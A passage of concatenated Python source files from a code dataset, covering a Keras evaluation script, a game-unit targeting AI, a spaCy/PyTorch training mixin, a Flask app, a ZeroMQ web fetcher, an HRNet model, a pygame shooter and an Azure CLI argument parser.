:return: the preprocess data\n \"\"\"\n # NOTE: # If you have conducted any pre-processing on the image,\n # please implement this function to apply onto test images.\n return X\n\n\ndef evaluate(test_generator):\n \"\"\"\n Evaluation on test images\n ******Please do not change this function******\n :param X_test: test images\n :param y_test: test labels\n :return: the accuracy\n \"\"\"\n # batch size is 16 for evaluation\n batch_size = 16\n\n # Load Model\n # **************************To Dear Tutor***********************************************************\n # the model generator from the train.py will not name as model, if you need to re-generator my\n # model, please check the train.py thanks\n # **************************************************************************************************\n model = load_model('model/resnet50mycnn.h5')\n return model.evaluate_generator(test_generator,steps=len(test_generator),verbose=1)\n\n\nif __name__ == '__main__':\n # Parse the arguments\n args = parse_args()\n\n # Test folder\n test_data_dir = 
args[\"test_data_dir\"]\n\n # Image size, please define according to your settings when training your model.\n image_size = (224, 224)\n\n # Load images with imageGenerator\n test_flow = load_images(test_data_dir, image_size)\n\n # Evaluation, please make sure that your training model uses \"accuracy\" as metrics, i.e., metrics=['accuracy']\n loss, accuracy = evaluate(test_flow)\n print(\"loss={}, accuracy={}\".format(loss, accuracy))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"300662033","text":"from . import map\nfrom . import tool, aStarSearch\n\nclass EnemyInfo():\n def __init__(self, entity, enemy, location, distance, damage_half):\n # 保存敌方生物\n self.enemy = enemy\n # 保存目的位置\n self.location = location\n # 保存到目的位置的路径距离\n self.distance = distance\n # 要经过几轮行动攻击到敌方生物\n if distance == 0:\n self.round_num = 0\n else:\n self.round_num = (distance - 1) // entity.attr.distance\n # 敌方生物要攻击几次才会死亡\n hurt = entity.attr.getHurt(enemy.attr, damage_half)\n self.kill_time = (enemy.health-1) // hurt \n # 敌方生物是否是远程生物\n self.remote = enemy.attr.remote\n \ndef getAction(entity, map, enemy_group):\n def getDestination(entity, map, enemy):\n # 获取敌方生物相邻的可攻击地图位置中和行动生物距离最近的地图位置\n dir_list = tool.getAttackPositions(enemy.map_x, enemy.map_y)\n best_pos = None\n min_dis = 0\n for offset_x, offset_y in dir_list:\n x, y = enemy.map_x + offset_x, enemy.map_y + offset_y\n if map.isValid(x, y) and map.isMovable(x, y):\n # 这个相邻地图位置是有效且可移动,获取和行动生物的路径距离\n distance = aStarSearch.getAStarDistance(map, (entity.map_x, entity.map_y), (x, y))\n if distance is None:\n # distance 为 None,表示这个相邻位置不可到达\n continue\n if best_pos is None:\n best_pos = (x, y)\n min_dis = distance\n elif distance < min_dis:\n # 保存路径距离最近的相邻地图位置\n best_pos = (x, y)\n min_dis = distance\n return best_pos\n \n # 创建敌方生物信息列表\n info_list = []\n # 保存最佳的敌方生物\n best_info = None\n # 行动生物是否可以进行远程攻击\n remote_attack = entity.canRemoteAttack(map)\n \n # 遍历敌方生物组中每一个生物,检查生物的地图位置\n for enemy in enemy_group:\n if remote_attack:\n location = None\n distance = 0\n else:\n if tool.isNextToEntity(entity, enemy):\n # 如果敌方生物在相邻的地图格子,不用移动就可以攻击到\n destination = (entity.map_x, entity.map_y) \n else:\n # 否则找到敌方生物的相邻地图格子中和行动生物距离最近的格子位置\n destination = getDestination(entity, map, enemy)\n \n if destination is None:\n # 表示不能行走到这个敌方生物的相邻可攻击的地图位置\n continue\n\n # 获取路径对象 location 和路径距离 distance\n location = aStarSearch.AStarSearch(map, (entity.map_x, entity.map_y), destination)\n _, _, distance = aStarSearch.getFirstStepAndDistance(location)\n \n # 判断基础伤害是否要减半\n if entity.attr.remote and not remote_attack:\n # 如果是远程生物且进行近战攻击,基础伤害减半\n damage_half = True\n else:\n damage_half = False\n # 创建 EnemyInfo 类对象\n enemyinfo = EnemyInfo(entity, enemy, location, distance, damage_half)\n # 添加到敌方生物信息列表\n info_list.append(enemyinfo)\n\n # 遍历可以攻击到的敌方生物信息列表,按照设定的策略选择最佳的敌方生物\n for info in info_list:\n if best_info == None:\n best_info = info\n else:\n if info.round_num < best_info.round_num:\n # 选择攻击前需要行动轮数较小的敌方生物\n best_info = info\n elif info.round_num == best_info.round_num:\n # 攻击前需要行动轮数相同时,比较其他属性\n if info.round_num == 0:\n # 如果本轮行动可以攻击到\n if info.kill_time < best_info.kill_time:\n # 选择杀死敌方生物需要的攻击次数最少的\n best_info = info\n elif info.kill_time == best_info.kill_time:\n # 如果杀死敌方生物需要的攻击次数相同\n if info.remote == True and best_info.remote == False:\n # 优先选择敌方的远程生物\n best_info = info\n elif info.distance < best_info.distance:\n # 优先选择距离更近的敌方生物\n best_info = 
info\n else:\n # 如果至少下一轮行动才能攻击到敌方生物时\n if info.distance < best_info.distance:\n # 优先选择距离更近的敌方生物\n best_info = info\n \n # 根据最佳敌方生物的行动轮数,选择行动策略\n if best_info.round_num == 0:\n # 本轮行动可以攻击到\n if best_info.location is None:\n # 目的位置为 None, 表示行动生物进行远程攻击\n return (None, best_info.enemy)\n else:\n # 目的位置不为 None, 表示行动生物进行近战攻击\n return ((best_info.location.x, best_info.location.y), best_info.enemy)\n elif best_info.round_num == 1:\n # 下一轮行动可以攻击到,本轮行走的距离,正好使下一轮能攻击到敌方生物\n distance = entity.attr.distance\n x, y = aStarSearch.getPosByDistance(best_info.location, distance)\n return ((x, y), None)\n else:\n # 至少二轮行动才能攻击到敌方生物时,本轮行走最大的距离\n distance = best_info.distance - entity.attr.distance\n x, y = aStarSearch.getPosByDistance(best_info.location, distance)\n return ((x, y), None)\n","sub_path":"test7/source/gameAI.py","file_name":"gameAI.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"132777484","text":"\"\"\"The module torch_mixin defindes Language mixin for pytorch.\"\"\"\nimport itertools\nimport json\nimport logging\nfrom pathlib import Path\nfrom typing import Any, Dict, Iterable, List, Optional, Sequence, Tuple, Union, cast\n\nfrom camphr_core.utils import get_defaults, get_requirements_line, import_attr\nimport spacy\nfrom spacy.gold import GoldParse\nimport spacy.language\nfrom spacy.language import Language\nfrom spacy.pipeline.pipes import Pipe\nfrom spacy.scorer import Scorer\nfrom spacy.tokens import Doc\nfrom spacy.util import minibatch\nimport torch\nfrom torch.optim.optimizer import Optimizer\n\nfrom .utils import TorchPipe, get_loss_from_docs\n\nlogger = logging.getLogger(__name__)\n\n\nclass TorchLanguage(Language):\n \"\"\"spacy.Language for pytorch.\n\n This class manages all `TorchPipe` components for the sake of training.\n\n Examples:\n >>> nlp = TorchLanguage(Vocab(), meta={\"lang\": \"en\"})\n >>> nlp.add_pipe(foo_torch_pipe)\n >>> optim = nlp.resume_training()\n >>> nlp.update(docs, golds, optim)\n \"\"\"\n\n LANG_FACTORY = \"camphr_torch\"\n\n def __init__(\n self,\n vocab=True,\n make_doc=True,\n max_length=10 ** 6,\n meta={},\n optimizer_config: Dict[str, Any] = {},\n **kwargs,\n ):\n meta = dict(meta)\n meta[\n \"lang_factory\"\n ] = self.LANG_FACTORY # lang_factory is necessary when restoring.\n meta.setdefault(\"requirements\", []).append(get_requirements_line())\n self.lang = meta.get(\"lang\", \"\")\n self.Defaults = get_defaults(self.lang)\n self.optimizer_config = optimizer_config\n super().__init__(vocab, make_doc, max_length, meta=meta, **kwargs)\n\n def update( # type: ignore\n self,\n docs: Sequence[Union[str, Doc]],\n golds: Sequence[Union[Dict[str, Any], GoldParse]],\n optimizer: Optimizer,\n verbose: bool = False,\n ):\n \"\"\"Update `TorchPipe` models in pipeline.\"\"\"\n _docs, _golds = self._format_docs_and_golds(docs, golds)\n self._update_pipes(_docs, _golds)\n self._update_params(_docs, optimizer, verbose)\n\n def _update_pipes(self, docs: Sequence[Doc], golds: Sequence[GoldParse]) -> None:\n for _, pipe in self.pipeline:\n pipe.update(docs, golds)\n\n def _update_params(\n self, docs: Sequence[Doc], optimizer: Optimizer, verbose: bool = False\n ):\n loss = get_loss_from_docs(docs)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if verbose:\n logger.info(f\"Loss: {loss.detach().item()}\")\n\n def evaluate( # type: ignore\n self,\n docs_golds: Sequence[Tuple[Union[str, Doc], Union[Dict[str, Any], GoldParse]]],\n batch_size: int = 16,\n 
scorer: Optional[Scorer] = None,\n ) -> Dict[str, Any]:\n \"\"\"Overrided to compute loss\"\"\"\n if scorer is None:\n scorer = Scorer(pipeline=self.pipeline)\n loss = 0.0\n for batch in minibatch(docs_golds, size=batch_size):\n docs, golds = zip(*batch)\n docs, golds = self._format_docs_and_golds(docs, golds) # type: ignore\n for _, pipe in self.pipeline:\n self._eval_pipe(pipe, docs, golds, batch_size=batch_size)\n loss += cast(float, get_loss_from_docs(docs).cpu().float().item())\n for doc, gold in zip(docs, golds):\n scorer.score(doc, gold)\n scores = scorer.scores\n scores[\"loss\"] = loss\n return scores\n\n def _eval_pipe(\n self,\n pipe: Pipe,\n docs: Sequence[Doc],\n golds: Sequence[GoldParse],\n batch_size: int,\n ) -> Sequence[Doc]:\n if not hasattr(pipe, \"pipe\"):\n docs = spacy.language._pipe(docs, pipe, {})\n elif hasattr(pipe, \"eval\"):\n pipe.eval(docs, golds) # type: ignore\n else:\n docs = list(pipe.pipe(docs, batch_size=batch_size)) # type: ignore\n return docs\n\n def resume_training(self, **kwargs) -> Optimizer: # type: ignore\n \"\"\"Gather all torch parameters in each `TorchPipe`s, and create an optimizer.\n\n Args:\n kwargs: passed to `self.make_optimizers`\n \"\"\"\n assert hasattr(self, \"pipeline\")\n\n params = self.get_params()\n return self.create_optimizer(params, **kwargs)\n\n def get_params(self):\n return itertools.chain.from_iterable(\n pipe.optim_parameters()\n for _, pipe in self.pipeline\n if isinstance(pipe, TorchPipe)\n )\n\n def require_optimizer_config(self):\n assert isinstance(\n self.optimizer_config, dict\n ), \"`self.optimizer_config` must be set.\"\n\n def create_optimizer(\n self, params: Iterable[Union[torch.Tensor, Dict[str, Any]]], **kwargs\n ) -> Optimizer:\n cls = import_attr(self.optimizer_config[\"class\"])\n return cls(params, **self.optimizer_config.get(\"params\", {}))\n\n @property\n def device(self) -> torch.device:\n if not hasattr(self, \"_device\"):\n self._device = torch.device(\"cpu\")\n self.to(self._device)\n else:\n for pipe in self.get_torch_pipes():\n assert self._device.type == pipe.device.type\n return self._device\n\n def get_torch_pipes(self) -> List[TorchPipe]:\n return [pipe for _, pipe in self.pipeline if isinstance(pipe, TorchPipe)]\n\n def to(self, device: torch.device) -> bool:\n flag = False\n for pipe in self.get_torch_pipes():\n flag = True\n pipe.to(device)\n self._device = device\n return flag\n\n def to_disk(self, path: Union[str, Path], exclude=tuple(), disable=None):\n \"\"\"Overrides Language.to_disk to save `nlp.lang` properly.\"\"\"\n path = Path(path)\n super().to_disk(path, exclude, disable)\n meta = self.meta\n meta[\"lang\"] = self.lang\n (path / \"meta.json\").write_text(json.dumps(meta))\n\n\ndef get_torch_nlp(lang: str, **cfg):\n return TorchLanguage(meta={\"lang\": lang}, **cfg)\n","sub_path":"subpackages/camphr_torch/camphr_torch/lang.py","file_name":"lang.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"32274914","text":"import os\n\nfrom flask import Flask, json\n\nfrom product_editor import ProductEditor\nfrom product_editor_service import ProductEditorWebService\nfrom product_file_db import ProductFileDb\nfrom product_overview import ProductOverview\nfrom product_overview_service import ProductOverviewWebService, NewestProductIdWebService\n\n\ndef create_flask():\n return Flask(__name__)\n\n\ndef create_product_file_db(path_to_db):\n \"\"\"\n :rtype: 
bakery.product_model.ProductFileDb\n \"\"\"\n return ProductFileDb(path_to_db)\n\n\ndef create_product_overview(product_gateway, flask):\n \"\"\"\n :type product_gateway: bakery.product_model.ProductGateway\n :type flask: flask.Flask\n \"\"\"\n product_overview = ProductOverview(product_gateway)\n ProductOverviewWebService.init_service(product_overview, flask)\n NewestProductIdWebService.init_service(product_overview, flask)\n\n\ndef create_product_editor(product_gateway, flask):\n \"\"\"\n :type product_gateway: bakery.product_model.ProductGateway\n :type flask: flask.Flask\n \"\"\"\n product_editor = ProductEditor(product_gateway)\n ProductEditorWebService.init_service(product_editor, flask)\n\n\ndef fill_db_with_sample_product(flask):\n \"\"\"\n :type flask: flask.Flask\n \"\"\"\n service = flask.test_client()\n service.post(\"/products\", data=json.dumps({\"name\": \"Bread\", \"price\": \"3.45\", \"id\": \"\"}),\n content_type=\"application/json\")\n\n\napp = create_flask()\nproduct_file_db = create_product_file_db(os.path.abspath(\"product_db\"))\n\ncreate_product_overview(product_file_db, app)\ncreate_product_editor(product_file_db, app)\n\nfill_db_with_sample_product(app)\n","sub_path":"ProjectEnvironment/Bakery/bakery/bakery.py","file_name":"bakery.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"370229530","text":"import sys\nimport time\nimport zmq\nimport logging\nimport requests\nfrom threading import Thread\nfrom queue import Queue\nfrom mosquito.messages import URL\nfrom mosquito.messages.pages import HTMLPage\n\n\nclass Worker(object):\n\n def __init__(self, work_port, result_port, uid, loop=None, timeout=1):\n context = zmq.Context()\n\n self.logger = logging.getLogger('fetcher')\n hdlr = logging.FileHandler('fetcher.log')\n formatter = logging.Formatter(\n '%(asctime)-15s %(levelname)s : %(message)s')\n hdlr.setFormatter(formatter)\n self.logger.addHandler(hdlr)\n self.logger.setLevel(logging.INFO)\n self.id = uid\n # Socket to receive messages on\n self.receiver = context.socket(zmq.PULL)\n self.receiver.connect(work_port)\n\n # Socket to send messages to\n self.sender = context.socket(zmq.PUSH)\n self.sender.connect(result_port)\n self.timeout = timeout\n\n max_threads = 1\n self.work_queue = Queue(max_threads * 10)\n self.result_queue = Queue()\n\n threads = []\n for i in range(max_threads):\n thread = Thread(target=self._fetch)\n thread.start()\n threads.append(thread)\n\n while True:\n url = URL(instance=self.receiver.recv())\n self.work_queue.put(url)\n\n while not self.result_queue.empty():\n page = self.result_queue.get()\n self.sender.send(page.encode())\n\n def _fetch(self):\n while True:\n url = self.work_queue.get()\n try:\n url = url.to_string()\n print(\"Requesting : {}\".format(url))\n r = requests.get(url, timeout=self.timeout)\n page = HTMLPage(response=r)\n self.result_queue.put(page)\n except Exception as exc:\n self.logger.info(\"ERROR: {} {}\".format(url, exc))\n","sub_path":"mosquito/fetcher/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"586162283","text":"import ast\nimport configparser\n\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.layers.python.layers import layers\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops.init_ops import VarianceScaling\n\nfrom .front import 
HRFront\nfrom .stage import HRStage\nfrom .transition import ExtraTransition\n\n\ndef he_normal_fanout(seed=None):\n \"\"\"He normal initializer.\n \n It draws samples from a truncated normal distribution centered on 0\n with `stddev = sqrt(2 / fan_out)`\n where `fan_in` is the number of input units in the weight tensor.\n To keep aligned with official implementation\n \"\"\"\n return VarianceScaling(\n scale=2., mode=\"fan_out\", distribution=\"truncated_normal\", seed=seed)\n\n\ndef load_net_cfg_from_file(cfgfile):\n def load_from_options(section, cfg):\n options = dict()\n xdict = dict(cfg.items(section))\n for key, value in xdict.items():\n try:\n value = ast.literal_eval(value)\n except:\n value = value\n options[key] = value\n return options\n\n cfg = configparser.ConfigParser()\n cfg.read(cfgfile)\n\n sections = cfg.sections()\n options = dict()\n for _section in sections:\n options[_section] = load_from_options(_section, cfg)\n\n return options\n\n\ndef HRNet(config_file, input, bn_is_training):\n cfg = load_net_cfg_from_file(config_file)\n stages = []\n\n front = HRFront(num_channels=cfg['FRONT']['num_channels'],\n output_channels=[i * cfg['FRONT']['output_channels'] for i in range(1, 3)])\n stages.append(front)\n\n num_stages = cfg['NET']['num_stages']\n for i in range(num_stages):\n _key = 'S{}'.format(i + 1)\n if i != num_stages - 1:\n _key_next = 'S{}'.format(i + 2)\n else:\n _key_next = 'S{}'.format(i + 1)\n _stage = HRStage(stage_id=i + 1,\n num_modules=cfg[_key]['num_modules'],\n num_channels=cfg[_key]['num_channels'],\n num_out_channels=cfg[_key_next]['num_channels'],\n num_blocks=cfg[_key]['num_blocks'],\n num_branches=cfg[_key]['num_branches'],\n block_type=cfg[_key]['block_type'],\n last_stage=True if i == num_stages - 1 else False)\n stages.append(_stage)\n # from stage1 to stage2, the #channel changed, so we need an extra transition layer.\n if i == 0:\n _stage = ExtraTransition(stage_id=i + 1,\n num_channels=cfg[_key]['num_channels'],\n num_branches=cfg[_key_next]['num_branches'],\n num_out_channels=cfg[_key_next]['num_channels'])\n stages.append(_stage)\n\n batch_norm_params = {'epsilon': 1e-5,\n 'scale': True,\n 'is_training': bn_is_training,\n 'updates_collections': ops.GraphKeys.UPDATE_OPS}\n with slim.arg_scope([layers.batch_norm], **batch_norm_params):\n with slim.arg_scope([slim.conv2d],\n weights_initializer=he_normal_fanout(),\n weights_regularizer=slim.l2_regularizer(cfg['NET']['weight_l2_scale'])):\n out = input\n for stage in stages:\n out = stage.forward(out)\n # print(len(out))\n return out\n","sub_path":"hr_rnet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"624313249","text":"import pygame\nimport time\nimport random\nimport collide\nimport collide_new\nfrom copy import deepcopy\n\npygame.init()\n\ndisplay_width = 800\ndisplay_height = 600\n\ngameDisplay = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption(\"OH MY\")\nclock = pygame.time.Clock()\n\n#color definitions\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (255,0,0)\n\n#back_img = pygame.image.load(\"outer_space.png\") \n\ndef text_objects(text, large_font):\n textSurface = large_font.render(text, True, black)\n return textSurface, textSurface.get_rect()\n \ndef message_display(text):\n large_font = pygame.font.Font('freesansbold.ttf', 115)\n #text_objects \n TextSurf, TextRect = text_objects(text, large_font)\n #to center on the 
screen\n TextRect.center = ((display_width/2),(display_height/2))\n #send to screen, but not display\n gameDisplay.blit(TextSurf, TextRect)\n #updates the display - gets to foreground \n pygame.display.update()\n \ndef crash():\n message_display(\"BOOM\")\n #reset game\n time.sleep(2)\n game_loop()\n\n#################################################\n\nclass Prototype(object):\n def __init__(self, pos_x, pos_y, vel_x, vel_y, vect_x, vect_y, dim_x, dim_y, imgs, scr_max_x,scr_max_y):\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.vel_x = vel_x\n self.vel_y = vel_y\n self.vect_x = vect_x\n self.vect_y = vect_y\n self.dim_x = dim_x\n self.dim_y = dim_y\n self.imgs = imgs\n self.scr_max_x = scr_max_x\n self.scr_max_y = scr_max_y\n\n\nclass Obstacle(Prototype):\n def __init__(self, *args):\n Prototype.__init__(self, *args)\n self.is_moving = False\n self.color = [255,100,50]\n self.name = \"obstacle\"\n\n def collide(self, with_name):\n print (\"OBSTACLE COLLIDED\", with_name)\n self.create()\n\n def create(self):\n delay = random.randrange(0, 350)\n self.pos_x = self.scr_max_x + self.dim_x + delay \n self.pos_y = random.randrange(0, self.scr_max_y-self.dim_y)\n self.is_moving = True\n\n def move(self):\n if self.is_moving == True:\n self.pos_y += self.vect_y * self.vel_y\n self.pos_x += self.vect_x * self.vel_x \n if self.imgs == None: \n #print (self.pos_x, self.pos_y)\n pygame.draw.rect(gameDisplay, self.color,\n [self.pos_x, self.pos_y,\n self.dim_x, self.dim_y])\n else: \n asteroid_img = pygame.image.load(self.imgs)\n asteroid_img = pygame.transform.scale(asteroid_img, (self.dim_x, self.dim_y))\n #asteroid_img = pygame.transform.rotate(asteroid_img, self.pos_x)\n #print (\"posx\",self.pos_x,\"posY:\",self.pos_y, \"dimX\", self.dim_x)\n gameDisplay.blit(asteroid_img, (self.pos_x, self.pos_y))\n\nclass Ship(Prototype):\n def __init__(self, *args):\n Prototype.__init__(self, *args)\n self.ship_img = pygame.image.load(self.imgs[0])\n self.ship_move_img = pygame.image.load(self.imgs[1])\n self.thrust = 0\n self.missle_bay = 25\n self.name = \"ship\"\n self.is_moving = True\n #self.ship_dims = ship_dims #[lenght, height] in px [x,y]\n\n def collide(self, with_name):\n print (\"SHIP COLLIDED\", with_name)\n\n \n def thruster(self, direction):\n self.thrust += self.vel_y*direction\n self.pos_y += self.thrust\n \n def move(self):\n if self.thrust != 0:\n if 0 < self.pos_y < 550:\n self.pos_y += self.thrust\n gameDisplay.blit(self.ship_move_img, (self.pos_x, self.pos_y))\n else:\n self.pos_y -= self.thrust\n else:\n gameDisplay.blit(self.ship_img, (self.pos_x, self.pos_y))\n\nclass Missle(Prototype):\n def __init__(self,*args, missle_bay):\n Prototype.__init__(self, *args)\n self.is_moving = False\n self.explosion_time = 0\n self.name = \"missle\"\n self.missle_bay = missle_bay\n self.expl_pos_x = -25\n self.expl_pos_y = -25\n #self.missle_img = pygame.image.load(missle_img)\n\n def fire(self, ship_pos_x, ship_pos_y):\n self.is_moving = True\n self.pos_x = ship_pos_x \n self.pos_y = ship_pos_y + self.missle_bay\n\n def move(self):\n if self.is_moving == True:\n if self.pos_x > self.scr_max_x+50:\n self.pos_x = -25\n self.is_moving = False\n else:\n self.pos_x += self.vel_x*self.vect_x\n pygame.draw.rect(gameDisplay, [255,0,0],\n [self.pos_x, self.pos_y,\n self.dim_x, self.dim_y])\n else:\n if self.explosion_time >0:\n self.explode()\n\n def explode(self):\n if self.explosion_time >0:\n vect = 100 - int(self.explosion_time*2)\n vect2 = self.explosion_time\n #print (vect)\n x = int(self.expl_pos_x - 
0.5*vect)\n y = int(self.expl_pos_y - 0.5*vect)\n ###\n explode_img = pygame.image.load(self.imgs)\n explode_img = pygame.transform.scale(explode_img, (vect, vect))\n #expolde_img = pygame.transform.rotate(explode_img, self.pos_x)\n gameDisplay.blit(explode_img, (x,y))\n self.explosion_time -=4\n if self.explosion_time <=0:\n self.pos_x = - 25\n else:\n self.explosion_time = 50\n self.is_moving = False\n\n def collide(self, with_name,x,y):\n print (\"MISSLE COLLIDED\", with_name)\n self.expl_pos_x = x\n self.expl_pos_y = y\n self.explode()\n\nclass Blaster(Missle):\n def __init__(self):\n Missle.__init__(self,0,0,20,0,1,1,1,1,None,0,0)\n self.is_moving = False\n self.distance = 300\n\n def fire(self, pos_x, pos_y):\n self.is_moving = True\n\n def move(self):\n if self.is_moving == True:\n self.pos_x += self.vel_x\n self.distance -= self.vel_x\n if self.distance <0:\n self.is_moving = False\n else: \n pygame.draw.rect(gameDisplay, [255,255,0],\n [self.pos_x, self.pos_y,\n self.dim_x, self.dim_y])\n\n#################################################\ndef game_loop():\n\n #prototype = ( pos_x, pos_y, \n #vel_x, vel_y, \n #vect_x, vect_y, \n #dim_x, dim_y, \n #imgs) #imgs =[list of imgs] or None\n\n scr_max_x = display_width\n scr_max_y = display_height \n\n ship = Ship(5, int(scr_max_y/2), \n 9,9,\n 1,1, \n 100, 50,\n [\"ship.png\", \"ship_move.png\"],\n scr_max_x, scr_max_y)\n\n obstacle1 = Obstacle(scr_max_x+50, int(scr_max_y/2),\n 5,0,\n -1,1,\n 25,25,\n \"asteroid_2.png\",\n scr_max_x, scr_max_y)\n obstacle2 = Obstacle(scr_max_x+50, int(scr_max_y/2),\n 4,1,\n -1,1,\n 35,45,\n \"asteroid_2.png\",\n scr_max_x, scr_max_y)\n \n obstacles = [obstacle1, obstacle2]\n for obstacle in obstacles: obstacle.create()\n\n\n missle1 = Missle(ship.pos_x+int(ship.dim_x/2),ship.pos_y+int(ship.dim_y/2),15,0,1,1,7,3,\"explode.png\",scr_max_x, scr_max_y, missle_bay = 6)\n missle2 = Missle(ship.pos_x+int(ship.dim_x/2),ship.pos_y+int(ship.dim_y/2),15,0,1,1,7,3,\"explode.png\",scr_max_x, scr_max_y, missle_bay = -6)\n missles = []\n for i in range(5):\n a = deepcopy(missle1)\n b = deepcopy(missle2)\n missles.append(a)\n missles.append(b)\n missle_index = 0\n\n #game\n play_game = True\n intact = True\n \n while play_game:\n #event handler loop\n #pygame.event.get() returns list of all input per frame.\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit\n quit()\n #Key presses \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n ship.thruster(-1)\n\n elif event.key == pygame.K_DOWN:\n ship.thruster(1)\n\n elif event.key == pygame.K_SPACE:\n miss = missles[missle_index]\n miss.fire(ship.pos_x+int(ship.dim_x/2), \n ship.pos_y+int(ship.dim_y/2))\n if missle_index < 9:\n missle_index += 1\n else: \n missle_index = 0 \n # if missle1.is_moving == True:\n # if missle2.is_moving == True: \n # missle1.explode()\n # missle2.explode()\n # else:\n # missle2.fire(ship.pos_x+int(ship.dim_x/2), \n # ship.pos_y+int(ship.dim_y/2), -6)\n \n # else:\n # missle1.fire(ship.pos_x+int(ship.dim_x/2), \n # ship.pos_y+int(ship.dim_y/2), 6)\n \n #Key released \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or\\\n event.key == pygame.K_RIGHT:\n ship.thrust = 0\n if event.key == pygame.K_UP or\\\n event.key == pygame.K_DOWN:\n ship.thrust = 0\n \n\n\n\n #fill covers screen with given \n gameDisplay.fill([0,0,0]) \n #draw things\n ################################################\n ship.move()\n #missle\n for missle in missles:\n missle.move()\n\n for obstacle in obstacles: \n if 
obstacle.is_moving == True:\n obstacle.move()\n if obstacle.pos_x<0:\n obstacle.create()\n\n ################################################\n #COLLIDE\n friendly_objects = [[ship], missles]\n foe_objects = [obstacles]\n #all_pairs = collide.get_pairs(friendly_objects, foe_objects)\n #collide.find_collisions(all_pairs)\n collide_new.find_collisions(friendly_objects, foe_objects)\n\n pygame.display.update()\n #frames per second (60)\n clock.tick(60)\n\ngame_loop()\npygame.quit()\nquit()\n","sub_path":"nova.py","file_name":"nova.py","file_ext":"py","file_size_in_byte":10439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"406623363","text":"import torch.nn as nn\nfrom encoder import Encoder\nfrom decoder import Decoder\nimport torch\n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n self.encoder = Encoder()\n self.decoder = Decoder()\n\n def forward(self, x):\n bottleneck = self.encoder(x)\n x = torch.squeeze(bottleneck, 1)\n x = torch.unsqueeze(x, 2)\n x = torch.unsqueeze(x, 3)\n x = self.decoder(x)\n return bottleneck, x","sub_path":"algorithm/resnet_gan/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"311932952","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# pylint: disable=line-too-long, too-many-statements\n\nimport argparse\n\nfrom knack.log import get_logger\nfrom knack.util import CLIError\n\nfrom azext_cosmosdb_preview.vendored_sdks.azure_mgmt_cosmosdb.models import (\n DatabaseRestoreResource,\n GremlinDatabaseRestoreResource\n)\n\nlogger = get_logger(__name__)\n\n\n# pylint: disable=protected-access, too-few-public-methods\nclass CreateDatabaseRestoreResource(argparse._AppendAction):\n def __call__(self, parser, namespace, values, option_string=None):\n if namespace.databases_to_restore is None:\n namespace.databases_to_restore = []\n if not values:\n # pylint: disable=line-too-long\n raise CLIError('usage error: --databases-to-restore [name=DatabaseName collections=CollectionName1 CollectionName2 ...]')\n database_restore_resource = DatabaseRestoreResource()\n i = 0\n for item in values:\n if i == 0:\n kvp = item.split('=', 1)\n if len(kvp) != 2 or kvp[0].lower() != 'name':\n # pylint: disable=line-too-long\n raise CLIError('usage error: --databases-to-restore [name=DatabaseName collections=CollectionName1 CollectionName2 ...]')\n database_name = kvp[1]\n database_restore_resource.database_name = database_name\n elif i == 1:\n kvp = item.split('=', 1)\n if len(kvp) != 2 or kvp[0].lower() != 'collections':\n # pylint: disable=line-too-long\n raise CLIError('usage error: --databases-to-restore [name=DatabaseName collections=CollectionName1 CollectionName2 ...]')\n database_restore_resource.collection_names = []\n collection_name = kvp[1]\n database_restore_resource.collection_names.append(collection_name)\n else:\n if database_restore_resource.collection_names is None:\n database_restore_resource.collection_names = []\n database_restore_resource.collection_names.append(item)\n i += 1\n 
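# `CreateDatabaseRestoreResource` above is an argparse action, so it is
# attached with `action=` and `nargs='+'`. A usage sketch; the parser and
# flag wiring here are illustrative, not copied from the real CLI:
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--databases-to-restore', nargs='+',
                    action=CreateDatabaseRestoreResource)
ns = parser.parse_args(
    ['--databases-to-restore', 'name=Db1', 'collections=Col1', 'Col2'])
# ns.databases_to_restore[0] now carries database_name='Db1' and
# collection_names=['Col1', 'Col2'].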
